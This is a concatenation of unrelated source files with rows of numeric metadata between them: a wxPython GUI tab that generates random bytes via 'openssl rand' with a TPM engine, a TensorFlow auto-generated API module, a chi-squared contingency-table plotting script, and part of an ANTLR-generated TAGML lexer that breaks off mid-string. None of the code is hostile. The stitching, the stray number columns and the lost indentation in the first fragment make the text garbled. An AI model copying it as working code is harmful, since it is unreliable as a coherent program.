button_sizer = wx.BoxSizer(wx.HORIZONTAL)
# instantiate the objects
button_gen_rng = wx.Button(self, -1, 'Generate RNG', size = (-1, 47))
self.rng_input = wx.TextCtrl(self, -1)
rng_input_blurb = wx.StaticText(self, -1, "No. of bytes to be generated:")
self.command_out = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.command_out.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
rng_type_blurb = wx.StaticText(self, -1, "Pick encoding of Random Number:")
self.rng_type = wx.ComboBox(self, -1, "RN Encoding", choices=rng_type_list, style=wx.CB_READONLY)
clearimage = wx.Image('../images/clear.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
clearbutton = wx.BitmapButton(self, -1, clearimage)
# ~clearbutton = wx.BitmapButton(self, -1, img.clear.getBitmap())
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the ui elements to the main sizer
mainsizer.Add(button_sizer, 0, wx.EXPAND | wx.LEFT, 5)
mainsizer.Add(self.command_out, 1, wx.EXPAND, 0)
button_sizer.Add(rng_input_blurb, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
button_sizer.Add(self.rng_input, 1, wx.ALIGN_CENTRE | wx.RIGHT, 10)
button_sizer.Add(rng_type_blurb, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
button_sizer.Add(self.rng_type, 1, wx.ALIGN_CENTRE | wx.LEFT, 5)
button_sizer.Add(button_gen_rng, 0, wx.ALIGN_CENTRE | wx.LEFT, 10)
button_sizer.Add(clearbutton, 0, wx.ALIGN_CENTRE | wx.LEFT, 10)
button_sizer.Add(backbutton, 0, wx.ALIGN_CENTRE | wx.ALL, 10)
# Set tooltips
button_gen_rng.SetToolTip(wx.ToolTip("Generate a Random Number, output is based on the dropdown menu."))
clearbutton.SetToolTip(wx.ToolTip("Clear all textboxes."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnGenRNG, button_gen_rng)
self.Bind(wx.EVT_BUTTON, self.OnClear, clearbutton)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
self.rng_input.write("32")
self.rng_type.SetSelection(0)
self.SetSizer(mainsizer)
def OnClear(self, evt):
self.command_out.Clear()
    # The direct parent is the notebook and the notebook's parent is the
    # frame, so we reach up two levels to ask the frame to close.
def OnBack(self, evt):
self.Parent.Parent.OnCloseWindow(None)
def OnGenRNG(self, evt):
no_bytes = self.rng_input.GetValue()
try:
no_bytes = abs(int(no_bytes))
except ValueError:
self.command_out.AppendText("Number of bytes is not an integer, try again.\n")
return
rng_output_type = self.rng_type.GetSelection()
if (no_bytes > 128):
no_bytes = 128
self.command_out.AppendText("Number of bytes restricted to 128 for performance purposes.\n")
# if output type is hex
if (rng_output_type == 0):
command_output = exec_cmd.execCLI([
"openssl", "rand",
"-engine", "tpm2tss",
"-hex", str(no_bytes),
])
split_output = command_output.split("\n")
for value in split_output:
if "warning" not in value.lower():
self.command_out.AppendText(value + "\n")
self.command_out.AppendText("'openssl rand -engine tpm2tss -hex " + str(no_bytes) + "' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
# if output type is base64
elif (rng_output_type == 1):
command_output = exec_cmd.execCLI([
"openssl", "rand",
"-engine", "tpm2tss",
"-base64", str(no_bytes),
])
split_output = command_output.split("\n")
for value in split_output:
if "warning" not in value.lower():
self.command_out.AppendText(value + "\n")
self.command_out.AppendText("'openssl rand -engine tpm2tss -base64 " + str(no_bytes) + "' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
self.command_out.AppendText("You need to select the rng output type.\n")
class Tab3Frame(wx.Frame):
def __init__(self, parent, title):
wx.Frame.__init__(self, parent, title="OpenSSL Engine", size=(1280, 720), style=(wx.DEFAULT_FRAME_STYLE & ~(wx.RESIZE_BORDER | wx.MAXIMIZE_BOX)))
self.Centre(wx.BOTH)
main_menu_font = wx.Font(14, wx.FONTFAMILY_ROMAN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
self.SetFont(main_menu_font)
# Instantiate all objects
tab_base = wx.Notebook(self, id=wx.ID_ANY, style=wx.NB_TOP)
self.tab1_rsa_cs = Tab_RSA_CS(tab_base)
self.tab2_ecc_cs = Tab_ECC_CS(tab_base)
tab3_rsa_misc = Tab_RSA_MISC(tab_base)
tab4_rng = Tab_RNG(tab_base)
# Add tabs
tab_base.AddPage(self.tab1_rsa_cs, 'RSA (Client/Server)')
tab_base.AddPage(self.tab2_ecc_cs, 'ECC (Client/Server)')
tab_base.AddPage(tab3_rsa_misc, 'RSA (Enc/Dec/Sign/Verify)')
tab_base.AddPage(tab4_rng, 'RNG')
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.Show(True)
def OnCloseWindow(self, evt):
#checkProcesses()
self.tab2_ecc_cs.Destroy()
self.tab1_rsa_cs.Destroy()
self.Parent.Show()
self.Destroy()
| 46.481481
| 277
| 0.595331
| 7,692
| 62,750
| 4.653666
| 0.062533
| 0.01989
| 0.029333
| 0.044921
| 0.861186
| 0.835317
| 0.800145
| 0.769751
| 0.743547
| 0.718991
| 0
| 0.015031
| 0.268462
| 62,750
| 1,349
| 278
| 46.515938
| 0.76477
| 0.081976
| 0
| 0.686275
| 0
| 0.029412
| 0.209885
| 0.042467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065686
| false
| 0
| 0.013725
| 0
| 0.1
| 0.021569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ae015ede3181ba1897f66d81cf153831718d4d1a
| 785
|
py
|
Python
|
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/test/combinations/__init__.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/test/combinations/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/test/combinations/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.__internal__.test.combinations namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.framework.combinations import generate
from tensorflow.python.framework.test_combinations import NamedObject
from tensorflow.python.framework.test_combinations import OptionalParameter
from tensorflow.python.framework.test_combinations import ParameterModifier
from tensorflow.python.framework.test_combinations import TestCombination
from tensorflow.python.framework.test_combinations import combine
from tensorflow.python.framework.test_combinations import times
del _print_function
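# --- Editor's sketch (illustrative, based on the documented
# test_combinations semantics): combine() expands its keyword arguments into
# the cross-product of all values, one parameter dict per combination, and
# times() merges several such combination lists into their cross-product.
if __name__ == "__main__":
    params = combine(mode=["graph", "eager"], use_gpu=[False])
    assert len(params) == 2  # 2 modes x 1 use_gpu value
    print(params)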
| 41.315789
| 82
| 0.863694
| 98
| 785
| 6.693878
| 0.408163
| 0.195122
| 0.213415
| 0.309451
| 0.466463
| 0.466463
| 0.466463
| 0
| 0
| 0
| 0
| 0
| 0.081529
| 785
| 18
| 83
| 43.611111
| 0.909847
| 0.236943
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.9
| 0
| 0.9
| 0.2
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bb163c570aa9e000c9a88b82f41d8ff09545b521
| 20
|
py
|
Python
|
telegram_bot/handlers/group/__init__.py
|
Oorzhakau/Iroxin_bot
|
c6608c4248cb5c4ed1b92748d95d5406eec76bb8
|
[
"MIT"
] | null | null | null |
telegram_bot/handlers/group/__init__.py
|
Oorzhakau/Iroxin_bot
|
c6608c4248cb5c4ed1b92748d95d5406eec76bb8
|
[
"MIT"
] | null | null | null |
telegram_bot/handlers/group/__init__.py
|
Oorzhakau/Iroxin_bot
|
c6608c4248cb5c4ed1b92748d95d5406eec76bb8
|
[
"MIT"
] | null | null | null |
from . import group
| 10
| 19
| 0.75
| 3
| 20
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 20
| 1
| 20
| 20
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bb2b2ef2fdfeca215a78ede3274855a4586c8821
| 7,715
|
py
|
Python
|
NLP/contingency_table.py
|
karandahele/Epilepsy-Repository
|
58f970b25808c0cdcd0dc44ab107cf00d9de74c2
|
[
"MIT"
] | 2
|
2019-11-20T11:12:22.000Z
|
2019-12-23T21:19:34.000Z
|
NLP/contingency_table.py
|
karandahele/Epilepsy-Repository
|
58f970b25808c0cdcd0dc44ab107cf00d9de74c2
|
[
"MIT"
] | 6
|
2020-01-14T17:13:40.000Z
|
2020-04-06T09:19:51.000Z
|
NLP/contingency_table.py
|
karandahele/Epilepsy-Repository
|
58f970b25808c0cdcd0dc44ab107cf00d9de74c2
|
[
"MIT"
] | 3
|
2020-01-14T17:12:02.000Z
|
2020-04-01T13:08:06.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sn
import pandas as pd
import os
from scipy.stats import chi2_contingency
def chi_squared_yates(
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
two_outcomes=True, print_numbers=False):
"""
"Chi-Squared Yates correction: chi2-stat, p-value, DOF, expected ndarray same shape as contingency table"
Returns text to add to contingency table.
"""
if two_outcomes:
obs = np.array([
[no_Gold, no_No_Surgery + no_Resections],
[no_Gold_absent_term, no_No_Surgery_absent_term + no_Resections_absent_term]
])
else:
# three outcomes
obs = np.array([
[no_Gold, no_Resections, no_No_Surgery],
[no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term]
])
chi_sq, p_value, dof, exp_arr = chi2_contingency(obs)
# NB: chi2_contingency applies Yates' correction only when dof == 1 (2x2 tables)
# table_chi_sq_text = str("Chi-Sq-stat = ") + str(round(chi_sq, 2))
if p_value < 0.001:
table_chi_sq_text = "****"
elif p_value < 0.01:
table_chi_sq_text = "***"
elif p_value < 0.025:
table_chi_sq_text = "**"
elif p_value < 0.05:
table_chi_sq_text = "*"
else:
table_chi_sq_text = "-"
if print_numbers:
print("Chi-Squared with Yates correction:")
print("chi2-stat =\t{}".format(chi_sq))
print("p-value =\t{}".format(p_value))
print("DOF =\t{}".format(dof))
print("expected ndarray same shape as contingency table = \n{}".format(exp_arr))
stats_string = "chi2-stat = " + str(round(chi_sq, 3)) +\
"\np-value = " + str(round(p_value, 9)) +\
"\nDOF = " + str(dof) +\
"\nexpected ndarray = \n" + str(np.around(exp_arr))
return table_chi_sq_text, stats_string
def contingency_table_two_outcomes(term,
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
save_to_folder='L:\\word_docs\\NLP\\contingency_tables\\',
print_numberss=False,
eps=False,
term_regex_str=""):
if not term_regex_str:
term_regex_str = "term"
conf_arr = np.array([
[no_Gold, no_No_Surgery + no_Resections],
[no_Gold_absent_term, no_No_Surgery_absent_term + no_Resections_absent_term]
])
df_cm = pd.DataFrame(conf_arr,
index = ['present', 'absent'],
columns = ['Entirely Seizure-Free', 'Other'])
fig = plt.figure()
plt.clf()
ax = fig.add_subplot(121)
fig.tight_layout()
ax.set_aspect(1)
res = sn.heatmap(df_cm, annot=True, vmin=0.0, vmax=100.0, fmt='.0f')
plt.yticks([0.5, 1.5], [term_regex_str + ' present', 'absent'], va='center')
plt.title('''Contingency Table \n Term: {}
'''.format(term))
# add chi-squared test *'s to the top left cell in 2 by 2 table
table_chi_sq_text, stats_string = chi_squared_yates(
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
print_numbers=print_numberss)
left, width = .25, .5
bottom, height = .25, .5
right = left + width
top = bottom + height
ax.text(
0.25*(left+right), 0.65*(bottom+top), table_chi_sq_text,
horizontalalignment='center',
verticalalignment='center',
fontsize=15, color='black',
transform=ax.transAxes)
# add subplot with only text of stats read out
ax2 = fig.add_subplot(122)
plt.title('''Chi-Squared with Yates correction''')
ax2.text(0.4*(left+right), 0.8*(bottom+top), stats_string,
horizontalalignment='center',
verticalalignment='center',
fontsize=9, color='black')
# remove axes
sn.despine(left=True, top=True, right=True, bottom=True)
#ax.set_frame_on(False)
plt.axis('off')
# save
if eps:
filename = 'confusion_table_2_' + str(term) + '.eps'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='eps', bbox_inches='tight', dpi=1200)
else:
filename = 'confusion_table_2_' + str(term) + '.png'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='png', bbox_inches='tight')
def contingency_table_three_outcomes(term,
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
save_to_folder='L:\\word_docs\\NLP\\contingency_tables\\',
print_numberss=False,
eps=False,
term_regex_str=""):
conf_arr = np.array([
[no_Gold, no_Resections, no_No_Surgery],
[no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term]
])
df_cm = pd.DataFrame(conf_arr,
index = ['present', 'absent'],
columns = ['Entirely Seizure-Free', 'Resections', 'No Surgery'])
fig = plt.figure()
plt.clf()
ax = fig.add_subplot(121)
fig.tight_layout()
ax.set_aspect(1)
res = sn.heatmap(df_cm, annot=True, vmin=0.0, vmax=100.0, fmt='.0f')
plt.yticks([0.5, 1.5], [term_regex_str + ' present', 'absent'], va='center')
plt.title('''Contingency Table \n Term: {}
'''.format(term))
# add chi-squared *'s to the top left cell in 2 by 2 table
table_chi_sq_text, stats_string = chi_squared_yates(
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
two_outcomes=False, print_numbers=print_numberss)
left, width = .25, .5
bottom, height = .25, .5
right = left + width
top = bottom + height
ax.text(
0.5*0.33*(left+right), 0.65*(bottom+top), table_chi_sq_text,
horizontalalignment='center',
verticalalignment='center',
fontsize=15, color='black',
transform=ax.transAxes)
# add subplot with only text of stats read out
ax2 = fig.add_subplot(122)
plt.title('''Chi-Squared''')
ax2.text(0.4*(left+right), 0.8*(bottom+top), stats_string,
horizontalalignment='center',
verticalalignment='center',
fontsize=9, color='black')
# remove axes
sn.despine(left=True, top=True, right=True, bottom=True)
#ax.set_frame_on(False)
plt.axis('off')
# save
if eps:
filename = 'confusion_table_3_' + str(term) + '.eps'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='eps', bbox_inches='tight', dpi=1200)
else:
filename = 'confusion_table_3_' + str(term) + '.png'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='png', bbox_inches='tight')
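# --- Editor's sketch: a minimal usage example for the helpers above. The
# counts, term and output folder are placeholders, not values from the study.
if __name__ == "__main__":
    stars, stats = chi_squared_yates(
        30, 20, 10,
        5, 25, 10,
        two_outcomes=True, print_numbers=True)
    print(stars)
    print(stats)
    contingency_table_two_outcomes(
        "seizure free", 30, 20, 10, 5, 25, 10,
        save_to_folder=".", print_numberss=True)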
| 36.051402
| 116
| 0.57615
| 964
| 7,715
| 4.31639
| 0.176349
| 0.064888
| 0.047585
| 0.03701
| 0.842826
| 0.823119
| 0.81615
| 0.787311
| 0.769286
| 0.769286
| 0
| 0.022151
| 0.309527
| 7,715
| 214
| 117
| 36.051402
| 0.758964
| 0.066883
| 0
| 0.693333
| 0
| 0
| 0.103111
| 0.011162
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.04
| 0
| 0.066667
| 0.073333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bb391905eec7a344edde03bf18f2a2bed35f8c55
| 33,929
|
py
|
Python
|
src/TAGMLLexer.py
|
brambg/HyperGraphTools
|
6d661927cca6bcd06e28530b2ea8b6652c9cbe0a
|
[
"Apache-2.0"
] | 1
|
2020-08-28T13:47:37.000Z
|
2020-08-28T13:47:37.000Z
|
src/TAGMLLexer.py
|
rhdekker/HyperGraphTools
|
5c69403ae352e390c2c049b013eefa8977cc796f
|
[
"Apache-2.0"
] | null | null | null |
src/TAGMLLexer.py
|
rhdekker/HyperGraphTools
|
5c69403ae352e390c2c049b013eefa8977cc796f
|
[
"Apache-2.0"
] | 1
|
2019-02-17T15:21:06.000Z
|
2019-02-17T15:21:06.000Z
|
# Generated from tagml/src/main/antlr4/nl/knaw/huc/di/tag/tagml/grammar/TAGMLLexer.g4 by ANTLR 4.7.2
from antlr4 import *
from io import StringIO
from typing import TextIO  # typing.io was deprecated and later removed; TextIO lives in typing
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2[")
buf.write("\u02ea\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\4\2")
buf.write("\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7\4\b\t\b\4")
buf.write("\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16\t\16\4\17")
buf.write("\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23\4\24\t\24")
buf.write("\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31\t\31\4\32")
buf.write("\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36\4\37\t\37")
buf.write("\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t&\4\'\t\'\4")
buf.write("(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4/\t/\4\60\t")
buf.write("\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64\4\65\t\65")
buf.write("\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:\4;\t;\4<\t<\4=")
buf.write("\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\tC\4D\tD\4E\tE\4")
buf.write("F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\tL\4M\tM\4N\tN\4")
buf.write("O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\tU\4V\tV\4W\tW\4")
buf.write("X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4^\t^\4_\t_\4`\t")
buf.write("`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4g\tg\4h\th\4i\t")
buf.write("i\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4p\tp\4q\tq\4r\t")
buf.write("r\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\3\2\3\2\3\2\3\2\3\2\3")
buf.write("\2\3\2\3\2\3\3\3\3\3\3\3\3\3\4\3\4\3\4\3\4\3\5\3\5\3\5")
buf.write("\3\5\3\6\3\6\3\6\3\6\3\7\3\7\6\7\u0114\n\7\r\7\16\7\u0115")
buf.write("\3\b\3\b\3\b\7\b\u011b\n\b\f\b\16\b\u011e\13\b\3\b\3\b")
buf.write("\5\b\u0122\n\b\3\t\6\t\u0125\n\t\r\t\16\t\u0126\3\n\3")
buf.write("\n\3\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\13\3\13\3\13\5\13\u013c\n\13\3\13\3")
buf.write("\13\6\13\u0140\n\13\r\13\16\13\u0141\3\f\3\f\3\f\3\f\3")
buf.write("\r\3\r\3\r\3\r\3\16\3\16\5\16\u014e\n\16\3\17\3\17\3\20")
buf.write("\3\20\3\21\3\21\3\22\3\22\3\22\6\22\u0159\n\22\r\22\16")
buf.write("\22\u015a\5\22\u015d\n\22\3\23\3\23\3\23\3\23\3\23\3\24")
buf.write("\3\24\3\24\3\24\3\25\3\25\3\25\3\25\3\26\3\26\3\26\3\26")
buf.write("\3\27\3\27\3\30\3\30\3\30\3\30\3\31\3\31\3\31\3\31\3\32")
buf.write("\3\32\3\32\3\32\3\32\3\33\3\33\3\33\3\33\3\33\3\34\3\34")
buf.write("\3\34\3\34\3\34\3\35\3\35\3\35\3\35\3\36\3\36\3\36\6\36")
buf.write("\u0190\n\36\r\36\16\36\u0191\3\36\3\36\3\36\3\36\6\36")
buf.write("\u0198\n\36\r\36\16\36\u0199\3\36\5\36\u019d\n\36\3\36")
buf.write("\3\36\3\37\6\37\u01a2\n\37\r\37\16\37\u01a3\3\37\3\37")
buf.write("\6\37\u01a8\n\37\r\37\16\37\u01a9\5\37\u01ac\n\37\3\37")
buf.write("\3\37\3 \3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3!\3\"")
buf.write("\3\"\3\"\3\"\3#\3#\3#\3#\3#\3$\3$\3$\3$\3%\3%\3%\3%\3")
buf.write("%\3&\3&\3&\3&\3\'\3\'\3\'\3\'\3(\3(\3(\3(\3)\3)\3)\3)")
buf.write("\3*\3*\3*\3*\3+\3+\6+\u01e7\n+\r+\16+\u01e8\3,\3,\3,\3")
buf.write(",\3,\3,\3-\3-\3-\3-\3.\3.\3.\3.\3/\3/\3\60\3\60\3\60\3")
buf.write("\60\3\60\3\61\3\61\3\61\3\61\3\62\7\62\u0205\n\62\f\62")
buf.write("\16\62\u0208\13\62\3\62\3\62\3\62\3\62\3\62\3\63\3\63")
buf.write("\5\63\u0211\n\63\3\63\3\63\3\64\7\64\u0216\n\64\f\64\16")
buf.write("\64\u0219\13\64\3\64\3\64\3\64\3\64\3\64\3\65\3\65\5\65")
buf.write("\u0222\n\65\3\66\3\66\3\67\3\67\38\38\39\39\39\69\u022d")
buf.write("\n9\r9\169\u022e\59\u0231\n9\3:\3:\3:\3:\3;\3;\3;\3;\3")
buf.write("<\3<\3<\3<\3=\3=\6=\u0241\n=\r=\16=\u0242\3>\3>\3>\3>")
buf.write("\3?\3?\3?\3?\3@\3@\3@\3@\3A\3A\3A\3A\3B\3B\3B\3B\3B\7")
buf.write("B\u025a\nB\fB\16B\u025d\13B\3B\3B\3B\3B\3C\3C\3D\3D\3")
buf.write("E\3E\3E\3F\3F\3F\3G\3G\3H\3H\3I\3I\3J\3J\3K\3K\3L\3L\3")
buf.write("M\3M\3N\3N\3O\3O\3P\3P\3Q\3Q\3R\3R\3S\3S\3T\3T\3T\3T\3")
buf.write("T\5T\u028c\nT\3U\3U\3U\5U\u0291\nU\3V\3V\3V\5V\u0296\n")
buf.write("V\3W\3W\3W\5W\u029b\nW\3X\3X\3X\5X\u02a0\nX\3Y\3Y\3Y\3")
buf.write("Z\3Z\3[\3[\3\\\3\\\3]\3]\3^\3^\3_\3_\3`\3`\3a\3a\3b\3")
buf.write("b\3c\3c\3d\3d\3e\3e\3f\3f\3g\3g\3h\3h\3i\3i\3j\3j\3k\3")
buf.write("k\3l\3l\3m\3m\3n\3n\3o\3o\3p\3p\3q\3q\3r\3r\3s\3s\3t\3")
buf.write("t\3t\3t\5t\u02dd\nt\3u\5u\u02e0\nu\3v\3v\5v\u02e4\nv\3")
buf.write("w\6w\u02e7\nw\rw\16w\u02e8\3\u025b\2x\r\3\17\4\21\5\23")
buf.write("\6\25\7\27\b\31\t\33\n\35\13\37\f!\r#\16%\17\'\20)\21")
buf.write("+\22-\23/\24\61\25\63\26\65\27\67\309\31;\32=\33?\34A")
buf.write("\35C\36E\37G I!K\"M#O$Q%S&U\'W(Y)[*]+_,a-c.e/g\60i\61")
buf.write("k\62m\63o\64q\65s\66u\67w8y9{:};\177<\u0081=\u0083>\u0085")
buf.write("?\u0087@\u0089A\u008bB\u008dC\u008fD\u0091E\u0093F\u0095")
buf.write("G\u0097H\u0099I\u009bJ\u009dK\u009fL\u00a1M\u00a3N\u00a5")
buf.write("O\u00a7P\u00a9Q\u00abR\u00adS\u00afT\u00b1U\u00b3V\u00b5")
buf.write("W\u00b7X\u00b9Y\u00bb\2\u00bd\2\u00bf\2\u00c1\2\u00c3")
buf.write("\2\u00c5\2\u00c7\2\u00c9\2\u00cb\2\u00cd\2\u00cf\2\u00d1")
buf.write("\2\u00d3\2\u00d5\2\u00d7\2\u00d9\2\u00db\2\u00dd\2\u00df")
buf.write("\2\u00e1\2\u00e3\2\u00e5\2\u00e7\2\u00e9\2\u00eb\2\u00ed")
buf.write("\2\u00ef\2\u00f1\2\u00f3\2\u00f5Z\u00f7[\r\2\3\4\5\6\7")
buf.write("\b\t\n\13\f%\4\2>>]^\3\2$$\3\2))\5\2>>]]~~\3\2\62;\4\2")
buf.write("CCcc\4\2DDdd\4\2EEee\4\2FFff\4\2GGgg\4\2HHhh\4\2IIii\4")
buf.write("\2JJjj\4\2KKkk\4\2LLll\4\2MMmm\4\2NNnn\4\2OOoo\4\2PPp")
buf.write("p\4\2QQqq\4\2RRrr\4\2SSss\4\2TTtt\4\2UUuu\4\2VVvv\4\2")
buf.write("WWww\4\2XXxx\4\2YYyy\4\2ZZzz\4\2[[{{\4\2\\\\||\4\2//a")
buf.write("a\5\2\u00b9\u00b9\u0302\u0371\u2041\u2042\n\2<<C\\c|\u2072")
buf.write("\u2191\u2c02\u2ff1\u3003\ud801\uf902\ufdd1\ufdf2\uffff")
buf.write("\5\2\13\f\17\17\"\"\2\u02eb\2\r\3\2\2\2\2\17\3\2\2\2\2")
buf.write("\21\3\2\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31")
buf.write("\3\2\2\2\3\33\3\2\2\2\3\35\3\2\2\2\3\37\3\2\2\2\3!\3\2")
buf.write("\2\2\4#\3\2\2\2\4%\3\2\2\2\4\'\3\2\2\2\4)\3\2\2\2\4+\3")
buf.write("\2\2\2\4-\3\2\2\2\4/\3\2\2\2\4\61\3\2\2\2\4\63\3\2\2\2")
buf.write("\5\65\3\2\2\2\5\67\3\2\2\2\59\3\2\2\2\5;\3\2\2\2\5=\3")
buf.write("\2\2\2\5?\3\2\2\2\5A\3\2\2\2\6C\3\2\2\2\6E\3\2\2\2\6G")
buf.write("\3\2\2\2\6I\3\2\2\2\6K\3\2\2\2\6M\3\2\2\2\6O\3\2\2\2\6")
buf.write("Q\3\2\2\2\6S\3\2\2\2\7U\3\2\2\2\bW\3\2\2\2\bY\3\2\2\2")
buf.write("\b[\3\2\2\2\b]\3\2\2\2\b_\3\2\2\2\ba\3\2\2\2\tc\3\2\2")
buf.write("\2\te\3\2\2\2\tg\3\2\2\2\ti\3\2\2\2\tk\3\2\2\2\tm\3\2")
buf.write("\2\2\no\3\2\2\2\nq\3\2\2\2\13s\3\2\2\2\13u\3\2\2\2\13")
buf.write("w\3\2\2\2\13y\3\2\2\2\13{\3\2\2\2\13}\3\2\2\2\13\177\3")
buf.write("\2\2\2\f\u0081\3\2\2\2\f\u0083\3\2\2\2\f\u0085\3\2\2\2")
buf.write("\f\u0087\3\2\2\2\f\u0089\3\2\2\2\f\u008b\3\2\2\2\f\u008d")
buf.write("\3\2\2\2\f\u008f\3\2\2\2\f\u0091\3\2\2\2\f\u0093\3\2\2")
buf.write("\2\f\u0095\3\2\2\2\f\u0097\3\2\2\2\f\u0099\3\2\2\2\f\u009b")
buf.write("\3\2\2\2\f\u009d\3\2\2\2\f\u009f\3\2\2\2\f\u00a1\3\2\2")
buf.write("\2\f\u00a3\3\2\2\2\f\u00a5\3\2\2\2\f\u00a7\3\2\2\2\f\u00a9")
buf.write("\3\2\2\2\f\u00ab\3\2\2\2\f\u00ad\3\2\2\2\f\u00af\3\2\2")
buf.write("\2\f\u00b1\3\2\2\2\f\u00b3\3\2\2\2\f\u00b5\3\2\2\2\f\u00b7")
buf.write("\3\2\2\2\f\u00b9\3\2\2\2\f\u00f5\3\2\2\2\f\u00f7\3\2\2")
buf.write("\2\r\u00f9\3\2\2\2\17\u0101\3\2\2\2\21\u0105\3\2\2\2\23")
